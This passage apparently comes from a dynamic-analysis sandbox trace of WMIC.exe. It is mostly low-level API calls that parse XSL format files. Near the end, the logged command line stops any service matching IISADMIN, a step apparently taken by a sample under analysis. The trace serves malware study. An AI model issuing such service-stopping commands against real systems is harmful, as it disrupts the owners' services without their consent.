(param_1="wmiclitableformat") returned 0x11 [0254.112] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0254.112] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0254.112] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0254.112] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0254.112] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0254.112] malloc (_Size=0x30) returned 0x308380 [0254.112] IUnknown:Release (This=0x211bd50) returned 0x0 [0254.112] IUnknown:Release (This=0x21178d0) returned 0x0 [0254.112] IUnknown:Release (This=0x211a280) returned 0x0 [0254.112] IXMLDOMNodeList:get_item (in: This=0x2119cc0, index=13, listItem=0xaf9d0 | out: listItem=0xaf9d0*=0x211bd50) returned 0x0 [0254.113] IXMLDOMNode:get_text (in: This=0x211bd50, text=0xaf9e0 | out: text=0xaf9e0*="texttable.xsl") returned 0x0 [0254.113] IXMLDOMNode:get_attributes (in: This=0x211bd50, attributeMap=0xaf9d8 | out: attributeMap=0xaf9d8*=0x21178d0) returned 0x0 [0254.113] malloc (_Size=0x18) returned 0x30c8a0 [0254.113] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21178d0, name="KEYWORD", namedItem=0xaf9e8 | out: namedItem=0xaf9e8*=0x211a280) returned 0x0 [0254.113] free (_Block=0x30c8a0) [0254.113] IXMLDOMNode:get_nodeValue (in: This=0x211a280, value=0xafa20 | out: value=0xafa20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x4)) returned 0x0 [0254.113] malloc (_Size=0x18) returned 0x30c8a0 [0254.113] malloc (_Size=0x18) returned 0x30c8c0 [0254.113] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0254.113] SysStringLen (param_1="TABLE") returned 0x5 [0254.113] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0254.113] SysStringLen (param_1="XML") returned 0x3 [0254.113] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0254.113] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0254.113] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0254.113] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0254.113] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0254.113] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0254.114] malloc (_Size=0x30) returned 0x3083c0 [0254.114] IUnknown:Release (This=0x211bd50) returned 0x0 [0254.114] IUnknown:Release (This=0x21178d0) returned 0x0 [0254.114] IUnknown:Release (This=0x211a280) returned 0x0 [0254.114] IXMLDOMNodeList:get_item (in: This=0x2119cc0, index=14, listItem=0xaf9d0 | out: listItem=0xaf9d0*=0x211bd50) returned 0x0 [0254.114] IXMLDOMNode:get_text (in: This=0x211bd50, text=0xaf9e0 | out: text=0xaf9e0*="texttable.xsl") returned 0x0 [0254.114] IXMLDOMNode:get_attributes (in: This=0x211bd50, attributeMap=0xaf9d8 | out: attributeMap=0xaf9d8*=0x21178d0) returned 0x0 [0254.114] malloc (_Size=0x18) returned 0x30c8e0 [0254.114] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21178d0, name="KEYWORD", namedItem=0xaf9e8 | out: namedItem=0xaf9e8*=0x211a280) returned 0x0 [0254.114] free (_Block=0x30c8e0) [0254.114] IXMLDOMNode:get_nodeValue (in: This=0x211a280, value=0xafa20 | out: value=0xafa20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x4)) returned 0x0 [0254.114] malloc (_Size=0x18) returned 0x30c8e0 [0254.114] malloc (_Size=0x18) returned 0x30c900 [0254.114] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0254.114] SysStringLen (param_1="TABLE") returned 0x5 [0254.114] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0254.114] SysStringLen (param_1="XML") returned 0x3 [0254.115] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0254.115] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0254.115] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0254.115] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0254.115] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0254.115] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0254.115] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0254.115] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0254.115] malloc (_Size=0x30) returned 0x308400 [0254.115] IUnknown:Release (This=0x211bd50) returned 0x0 [0254.115] IUnknown:Release (This=0x21178d0) returned 0x0 [0254.115] IUnknown:Release (This=0x211a280) returned 0x0 [0254.115] IXMLDOMNodeList:get_item (in: This=0x2119cc0, index=15, listItem=0xaf9d0 | out: listItem=0xaf9d0*=0x211bd50) returned 0x0 [0254.115] IXMLDOMNode:get_text (in: This=0x211bd50, text=0xaf9e0 | out: text=0xaf9e0*="htable.xsl") returned 0x0 [0254.115] IXMLDOMNode:get_attributes (in: This=0x211bd50, attributeMap=0xaf9d8 | out: attributeMap=0xaf9d8*=0x21178d0) returned 0x0 [0254.115] malloc (_Size=0x18) returned 0x30c920 [0254.115] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21178d0, name="KEYWORD", namedItem=0xaf9e8 | out: namedItem=0xaf9e8*=0x211a280) returned 0x0 [0254.116] free (_Block=0x30c920) [0254.116] IXMLDOMNode:get_nodeValue (in: This=0x211a280, value=0xafa20 | out: value=0xafa20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x4)) returned 0x0 [0254.116] malloc (_Size=0x18) returned 0x30c920 [0254.116] malloc (_Size=0x18) returned 0x30c940 [0254.116] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0254.116] SysStringLen (param_1="TABLE") returned 0x5 [0254.116] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0254.116] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0254.116] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0254.116] SysStringLen (param_1="XML") returned 0x3 [0254.116] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0254.116] SysStringLen (param_1="texttablewsys") returned 0xd [0254.116] SysStringLen (param_1="XML") returned 0x3 [0254.116] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0254.116] malloc (_Size=0x30) returned 0x308440 [0254.116] IUnknown:Release (This=0x211bd50) returned 0x0 [0254.116] IUnknown:Release (This=0x21178d0) returned 0x0 [0254.116] IUnknown:Release (This=0x211a280) returned 0x0 [0254.116] IXMLDOMNodeList:get_item (in: This=0x2119cc0, index=16, listItem=0xaf9d0 | out: listItem=0xaf9d0*=0x211bd50) returned 0x0 [0254.116] IXMLDOMNode:get_text (in: This=0x211bd50, text=0xaf9e0 | out: text=0xaf9e0*="htable.xsl") returned 0x0 [0254.117] IXMLDOMNode:get_attributes (in: This=0x211bd50, attributeMap=0xaf9d8 | out: attributeMap=0xaf9d8*=0x21178d0) returned 0x0 [0254.117] malloc (_Size=0x18) returned 0x30c960 [0254.117] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21178d0, name="KEYWORD", namedItem=0xaf9e8 | out: namedItem=0xaf9e8*=0x211a280) returned 0x0 [0254.117] free (_Block=0x30c960) [0254.117] IXMLDOMNode:get_nodeValue (in: This=0x211a280, value=0xafa20 | out: value=0xafa20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x4)) returned 0x0 [0254.117] malloc (_Size=0x18) returned 0x30c960 [0254.117] malloc (_Size=0x18) returned 0x30c980 [0254.117] SysStringLen (param_1="htable-sortby") returned 0xd [0254.117] SysStringLen (param_1="TABLE") returned 0x5 [0254.117] SysStringLen (param_1="htable-sortby") returned 0xd [0254.117] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0254.117] SysStringLen (param_1="htable-sortby") returned 0xd [0254.117] SysStringLen (param_1="XML") returned 0x3 [0254.117] SysStringLen (param_1="htable-sortby") returned 0xd [0254.117] SysStringLen (param_1="texttablewsys") returned 0xd [0254.117] SysStringLen (param_1="htable-sortby") returned 0xd [0254.117] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0254.117] SysStringLen (param_1="XML") returned 0x3 [0254.117] SysStringLen (param_1="htable-sortby") returned 0xd [0254.118] malloc (_Size=0x30) returned 0x308480 [0254.118] IUnknown:Release (This=0x211bd50) returned 0x0 [0254.118] IUnknown:Release (This=0x21178d0) returned 0x0 [0254.118] IUnknown:Release (This=0x211a280) returned 0x0 [0254.118] IXMLDOMNodeList:get_item (in: This=0x2119cc0, index=17, listItem=0xaf9d0 | out: listItem=0xaf9d0*=0x211bd50) returned 0x0 [0254.118] IXMLDOMNode:get_text (in: This=0x211bd50, text=0xaf9e0 | out: text=0xaf9e0*="mof.xsl") returned 0x0 [0254.118] IXMLDOMNode:get_attributes (in: This=0x211bd50, attributeMap=0xaf9d8 | out: attributeMap=0xaf9d8*=0x21178d0) returned 0x0 [0254.118] malloc (_Size=0x18) returned 0x30c9a0 [0254.118] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21178d0, name="KEYWORD", namedItem=0xaf9e8 | out: namedItem=0xaf9e8*=0x211a280) returned 0x0 [0254.118] free (_Block=0x30c9a0) [0254.118] IXMLDOMNode:get_nodeValue (in: This=0x211a280, value=0xafa20 | out: value=0xafa20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x4)) returned 0x0 [0254.118] malloc (_Size=0x18) returned 0x30c9a0 [0254.118] malloc (_Size=0x18) returned 0x30c9c0 [0254.118] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0254.118] SysStringLen (param_1="TABLE") returned 0x5 [0254.118] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0254.119] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0254.119] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0254.119] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0254.119] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0254.119] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0254.119] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0254.119] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0254.119] malloc (_Size=0x30) returned 0x3084c0 [0254.119] IUnknown:Release (This=0x211bd50) returned 0x0 [0254.119] IUnknown:Release (This=0x21178d0) returned 0x0 [0254.119] IUnknown:Release (This=0x211a280) returned 0x0 [0254.119] IXMLDOMNodeList:get_item (in: This=0x2119cc0, index=18, listItem=0xaf9d0 | out: listItem=0xaf9d0*=0x211bd50) returned 0x0 [0254.119] IXMLDOMNode:get_text (in: This=0x211bd50, text=0xaf9e0 | out: text=0xaf9e0*="mof.xsl") returned 0x0 [0254.119] IXMLDOMNode:get_attributes (in: This=0x211bd50, attributeMap=0xaf9d8 | out: attributeMap=0xaf9d8*=0x21178d0) returned 0x0 [0254.119] malloc (_Size=0x18) returned 0x30c9e0 [0254.119] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21178d0, name="KEYWORD", namedItem=0xaf9e8 | out: namedItem=0xaf9e8*=0x211a280) returned 0x0 [0254.119] free (_Block=0x30c9e0) [0254.120] IXMLDOMNode:get_nodeValue (in: This=0x211a280, value=0xafa20 | out: value=0xafa20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x4)) returned 0x0 [0254.120] malloc (_Size=0x18) returned 0x30c9e0 [0254.120] malloc (_Size=0x18) returned 0x30ca00 [0254.120] SysStringLen (param_1="wmiclimofformat") returned 0xf [0254.120] SysStringLen (param_1="TABLE") returned 0x5 [0254.120] SysStringLen (param_1="wmiclimofformat") returned 0xf [0254.120] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0254.120] SysStringLen (param_1="wmiclimofformat") returned 0xf [0254.120] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0254.120] SysStringLen (param_1="wmiclimofformat") returned 0xf [0254.120] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0254.120] SysStringLen (param_1="wmiclimofformat") returned 0xf [0254.120] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0254.120] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0254.120] SysStringLen (param_1="wmiclimofformat") returned 0xf [0254.120] malloc (_Size=0x30) returned 0x308500 [0254.120] IUnknown:Release (This=0x211bd50) returned 0x0 [0254.120] IUnknown:Release (This=0x21178d0) returned 0x0 [0254.120] IUnknown:Release (This=0x211a280) returned 0x0 [0254.120] IXMLDOMNodeList:get_item (in: This=0x2119cc0, index=19, listItem=0xaf9d0 | out: listItem=0xaf9d0*=0x211bd50) returned 0x0 [0254.120] IXMLDOMNode:get_text (in: This=0x211bd50, text=0xaf9e0 | out: text=0xaf9e0*="textvaluelist.xsl") returned 0x0 [0254.120] IXMLDOMNode:get_attributes (in: This=0x211bd50, attributeMap=0xaf9d8 | out: attributeMap=0xaf9d8*=0x21178d0) returned 0x0 [0254.121] malloc (_Size=0x18) returned 0x30ca20 [0254.121] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21178d0, name="KEYWORD", namedItem=0xaf9e8 | out: namedItem=0xaf9e8*=0x211a280) returned 0x0 [0254.121] free (_Block=0x30ca20) [0254.121] IXMLDOMNode:get_nodeValue (in: This=0x211a280, value=0xafa20 | out: value=0xafa20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x4)) returned 0x0 [0254.121] malloc (_Size=0x18) returned 0x30ca20 [0254.121] malloc (_Size=0x18) returned 0x30ca40 [0254.121] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0254.121] SysStringLen (param_1="TABLE") returned 0x5 [0254.121] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0254.121] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0254.121] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0254.121] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0254.121] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0254.121] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0254.121] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0254.121] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0254.121] malloc (_Size=0x30) returned 0x308540 [0254.121] IUnknown:Release (This=0x211bd50) returned 0x0 [0254.122] IUnknown:Release (This=0x21178d0) returned 0x0 [0254.122] IUnknown:Release (This=0x211a280) returned 0x0 [0254.122] IXMLDOMNodeList:get_item (in: This=0x2119cc0, index=20, listItem=0xaf9d0 | out: listItem=0xaf9d0*=0x211bd50) returned 0x0 [0254.122] IXMLDOMNode:get_text (in: This=0x211bd50, text=0xaf9e0 | out: text=0xaf9e0*="textvaluelist.xsl") returned 0x0 [0254.122] IXMLDOMNode:get_attributes (in: This=0x211bd50, attributeMap=0xaf9d8 | out: attributeMap=0xaf9d8*=0x21178d0) returned 0x0 [0254.122] malloc (_Size=0x18) returned 0x30ca60 [0254.122] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x21178d0, name="KEYWORD", namedItem=0xaf9e8 | out: namedItem=0xaf9e8*=0x211a280) returned 0x0 [0254.122] free (_Block=0x30ca60) [0254.122] IXMLDOMNode:get_nodeValue (in: This=0x211a280, value=0xafa20 | out: value=0xafa20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x4)) returned 0x0 [0254.122] malloc (_Size=0x18) returned 0x30ca60 [0254.122] malloc (_Size=0x18) returned 0x30ca80 [0254.122] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0254.122] SysStringLen (param_1="TABLE") returned 0x5 [0254.122] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0254.123] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0254.123] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0254.123] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0254.123] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0254.123] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0254.123] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0254.123] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0254.123] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0254.123] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0254.123] malloc (_Size=0x30) returned 0x308580 [0254.123] IUnknown:Release (This=0x211bd50) returned 0x0 [0254.123] IUnknown:Release (This=0x21178d0) returned 0x0 [0254.123] IUnknown:Release (This=0x211a280) returned 0x0 [0254.123] IUnknown:Release (This=0x2119cc0) returned 0x0 [0254.123] FreeThreadedDOMDocument:IUnknown:Release (This=0x211bc50) returned 0x1 [0254.123] FreeThreadedDOMDocument:IUnknown:Release (This=0x21171d0) returned 0x0 [0254.123] free (_Block=0x306f30) [0254.123] GetCommandLineW () returned="\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%IISADMIN%%'\" call stopservice" [0254.123] malloc (_Size=0xe0) returned 0x306ef0 [0254.124] memcpy_s (in: _Destination=0x306ef0, _DestinationSize=0xde, _Source=0x1a25ee, _SourceSize=0xd2 | out: _Destination=0x306ef0) returned 0x0 [0254.124] malloc (_Size=0x18) returned 0x30caa0 [0254.124] malloc (_Size=0x18) returned 0x30cac0 [0254.124] malloc (_Size=0x18) returned 0x30cae0 [0254.124] malloc (_Size=0x18) returned 0x30cb00 [0254.124] malloc (_Size=0x80) returned 0x30cd30 [0254.124] GetLocalTime (in: lpSystemTime=0xafb90 | out: lpSystemTime=0xafb90*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x2, wDay=0x1c, wHour=0x14, wMinute=0x2a, wSecond=0xc, wMilliseconds=0x150)) [0254.124] _vsnwprintf (in: _Buffer=0x30cd30, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0xafae8 | out: _Buffer="04-28-2020T20:42:12") returned 19 [0254.124] lstrlenW (lpString=" path Win32_Service where \"name like '%%IISADMIN%%'\" call stopservice") returned 70 [0254.124] malloc (_Size=0x8e) returned 0x30cdc0 [0254.124] lstrlenW (lpString=" path Win32_Service where \"name like '%%IISADMIN%%'\" call stopservice") returned 70 [0254.124] lstrlenW (lpString=" path Win32_Service where \"name like '%%IISADMIN%%'\" call stopservice") returned 70 [0254.124] malloc (_Size=0x8e) returned 0x30ce60 [0254.124] lstrlenW (lpString=" path Win32_Service where \"name like '%%IISADMIN%%'\" call stopservice") returned 70 [0254.124] lstrlenW (lpString=" path Win32_Service where \"name like '%%IISADMIN%%'\" call stopservice") returned 70 [0254.124] lstrlenW (lpString=" path Win32_Service where \"name like '%%IISADMIN%%'\" call stopservice") returned 70 [0254.124] malloc (_Size=0xa) returned 0x30cb20 [0254.124] lstrlenW (lpString="path") returned 4 [0254.125] _wcsicmp (_String1="path", _String2="\"NULL\"") returned 78 [0254.125] malloc (_Size=0xa) returned 0x30cb40 [0254.125] malloc (_Size=0x8) returned 0x307140 [0254.125] free (_Block=0x0) [0254.125] free (_Block=0x30cb20) [0254.125] lstrlenW (lpString=" path Win32_Service where \"name like '%%IISADMIN%%'\" call stopservice") returned 70 [0254.125] malloc (_Size=0x1c) returned 0x30cf00 [0254.125] lstrlenW (lpString="Win32_Service") returned 13 [0254.125] _wcsicmp (_String1="Win32_Service", _String2="\"NULL\"") returned 85 [0254.125] malloc (_Size=0x1c) returned 0x30cf30 [0254.125] malloc (_Size=0x10) returned 0x30cb20 [0254.125] memmove_s (in: _Destination=0x30cb20, _DestinationSize=0x8, _Source=0x307140, _SourceSize=0x8 | out: _Destination=0x30cb20) returned 0x0 [0254.125] free (_Block=0x307140) [0254.125] free (_Block=0x0) [0254.125] free (_Block=0x30cf00) [0254.125] lstrlenW (lpString=" path Win32_Service where \"name like '%%IISADMIN%%'\" call stopservice") returned 70 [0254.125] malloc (_Size=0xc) returned 0x30cb60 [0254.125] lstrlenW (lpString="where") returned 5 [0254.125] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0254.125] malloc (_Size=0xc) returned 0x30cb80 [0254.125] malloc (_Size=0x18) returned 0x30cba0 [0254.125] memmove_s (in: _Destination=0x30cba0, _DestinationSize=0x10, _Source=0x30cb20, _SourceSize=0x10 | out: _Destination=0x30cba0) returned 0x0 [0254.125] free (_Block=0x30cb20) [0254.125] free (_Block=0x0) [0254.125] free (_Block=0x30cb60) [0254.125] lstrlenW (lpString=" path Win32_Service where \"name like '%%IISADMIN%%'\" call stopservice") returned 70 [0254.125] malloc (_Size=0x36) returned 0x3085c0 [0254.126] lstrlenW (lpString="\"name like '%%IISADMIN%%'\"") returned 26 [0254.126] _wcsicmp (_String1="\"name like '%%IISADMIN%%'\"", _String2="\"NULL\"") returned -20 [0254.126] lstrlenW (lpString="\"name like '%%IISADMIN%%'\"") returned 26 [0254.126] lstrlenW (lpString="\"name like '%%IISADMIN%%'\"") returned 26 [0254.126] malloc (_Size=0x36) returned 0x308600 [0254.126] malloc (_Size=0x20) returned 0x30cf00 [0254.126] memmove_s (in: _Destination=0x30cf00, _DestinationSize=0x18, _Source=0x30cba0, _SourceSize=0x18 | out: _Destination=0x30cf00) returned 0x0 [0254.126] free (_Block=0x30cba0) [0254.126] free (_Block=0x0) [0254.126] free (_Block=0x3085c0) [0254.126] lstrlenW (lpString=" path Win32_Service where \"name like '%%IISADMIN%%'\" call stopservice") returned 70 [0254.126] malloc (_Size=0xa) returned 0x30cba0 [0254.126] lstrlenW (lpString="call") returned 4 [0254.126] _wcsicmp (_String1="call", _String2="\"NULL\"") returned 65 [0254.126] malloc (_Size=0xa) returned 0x30cb60 [0254.126] malloc (_Size=0x30) returned 0x3085c0 [0254.126] memmove_s (in: _Destination=0x3085c0, _DestinationSize=0x20, _Source=0x30cf00, _SourceSize=0x20 | out: _Destination=0x3085c0) returned 0x0 [0254.126] free (_Block=0x30cf00) [0254.126] free (_Block=0x0) [0254.126] free (_Block=0x30cba0) [0254.126] lstrlenW (lpString=" path Win32_Service where \"name like '%%IISADMIN%%'\" call stopservice") returned 70 [0254.126] malloc (_Size=0x18) returned 0x30cba0 [0254.126] lstrlenW (lpString="stopservice") returned 11 [0254.126] _wcsicmp (_String1="stopservice", _String2="\"NULL\"") returned 81 [0254.126] malloc (_Size=0x18) returned 0x30cb20 [0254.127] free (_Block=0x0) [0254.127] free (_Block=0x30cba0) [0254.127] malloc (_Size=0x30) returned 0x308640 [0254.127] lstrlenW (lpString="QUIT") returned 4 [0254.127] lstrlenW (lpString="path") returned 4 [0254.127] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="QUIT", cchCount2=4) returned 1 [0254.127] lstrlenW (lpString="EXIT") returned 4 [0254.127] lstrlenW (lpString="path") returned 4 [0254.127] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="EXIT", cchCount2=4) returned 3 [0254.127] free (_Block=0x308640) [0254.127] WbemLocator:IUnknown:AddRef (This=0x1c81390) returned 0x2 [0254.127] malloc (_Size=0x30) returned 0x308640 [0254.127] lstrlenW (lpString="/") returned 1 [0254.127] lstrlenW (lpString="path") returned 4 [0254.127] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0254.127] lstrlenW (lpString="-") returned 1 [0254.127] lstrlenW (lpString="path") returned 4 [0254.127] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0254.127] lstrlenW (lpString="CLASS") returned 5 [0254.128] lstrlenW (lpString="path") returned 4 [0254.128] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="CLASS", cchCount2=5) returned 3 [0254.128] lstrlenW (lpString="PATH") returned 4 [0254.128] lstrlenW (lpString="path") returned 4 [0254.128] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="PATH", cchCount2=4) returned 2 [0254.128] lstrlenW (lpString="/") returned 1 [0254.128] lstrlenW (lpString="Win32_Service") returned 13 [0254.128] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="/", cchCount2=1) returned 3 [0254.128] lstrlenW (lpString="-") returned 1 [0254.128] lstrlenW (lpString="Win32_Service") returned 13 [0254.128] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="-", cchCount2=1) returned 3 [0254.128] lstrlenW (lpString="Win32_Service") returned 13 [0254.128] malloc (_Size=0x1c) returned 0x30cf00 [0254.128] lstrlenW (lpString="Win32_Service") returned 13 [0254.128] wcstok (in: _String="Win32_Service", _Delimiter=".", _Context=0xfff | out: _String="Win32_Service", _Context=0xfff) returned="Win32_Service" [0254.128] lstrlenW (lpString="Win32_Service") returned 13 [0254.128] malloc (_Size=0x1c) returned 0x307140 [0254.128] lstrlenW (lpString="Win32_Service") returned 13 [0254.128] wcstok (in: _String=0x0, _Delimiter=",", _Context=0xffffffffffda68b0 | out: _String=0x0, _Context=0xffffffffffda68b0) returned 0x0 [0254.128] lstrlenW (lpString="") returned 0 [0254.128] lstrlenW (lpString="WHERE") returned 5 [0254.128] lstrlenW (lpString="where") returned 5 [0254.129] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0254.129] lstrlenW (lpString="/") returned 1 [0254.129] lstrlenW (lpString="name like '%%IISADMIN%%'") returned 24 [0254.129] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%IISADMIN%%'", cchCount1=24, lpString2="/", cchCount2=1) returned 3 [0254.129] lstrlenW (lpString="-") returned 1 [0254.129] lstrlenW (lpString="name like '%%IISADMIN%%'") returned 24 [0254.129] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%IISADMIN%%'", cchCount1=24, lpString2="-", cchCount2=1) returned 3 [0254.129] lstrlenW (lpString="name like '%%IISADMIN%%'") returned 24 [0254.129] malloc (_Size=0x32) returned 0x308680 [0254.129] lstrlenW (lpString="name like '%%IISADMIN%%'") returned 24 [0254.129] lstrlenW (lpString="/") returned 1 [0254.129] lstrlenW (lpString="call") returned 4 [0254.129] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0254.129] lstrlenW (lpString="-") returned 1 [0254.129] lstrlenW (lpString="call") returned 4 [0254.129] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0254.129] lstrlenW (lpString="call") returned 4 [0254.129] malloc (_Size=0xa) returned 0x30cba0 [0254.129] lstrlenW (lpString="call") returned 4 [0254.129] lstrlenW (lpString="GET") returned 3 [0254.129] lstrlenW (lpString="call") returned 4 [0254.129] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0254.129] lstrlenW (lpString="LIST") returned 4 [0254.129] lstrlenW (lpString="call") returned 4 [0254.130] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0254.130] lstrlenW (lpString="SET") returned 3 [0254.130] lstrlenW (lpString="call") returned 4 [0254.130] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0254.130] lstrlenW (lpString="CREATE") returned 6 [0254.130] lstrlenW (lpString="call") returned 4 [0254.130] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0254.130] lstrlenW (lpString="CALL") returned 4 [0254.130] lstrlenW (lpString="call") returned 4 [0254.130] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0254.130] lstrlenW (lpString="/") returned 1 [0254.130] lstrlenW (lpString="stopservice") returned 11 [0254.130] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="/", cchCount2=1) returned 3 [0254.130] lstrlenW (lpString="-") returned 1 [0254.130] lstrlenW (lpString="stopservice") returned 11 [0254.130] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="-", cchCount2=1) returned 3 [0254.130] lstrlenW (lpString="stopservice") returned 11 [0254.130] malloc (_Size=0x18) returned 0x30cbc0 [0254.130] lstrlenW (lpString="stopservice") returned 11 [0254.130] ??0CHString@@QEAA@XZ () returned 0xad738 [0254.130] GetCurrentThreadId () returned 0xabc [0254.130] GetCurrentThreadId () returned 0xabc [0254.131] ??0CHString@@QEAA@XZ () returned 0xad508 [0254.131] malloc (_Size=0x8) returned 0x30cf60 [0254.131] malloc (_Size=0x18) returned 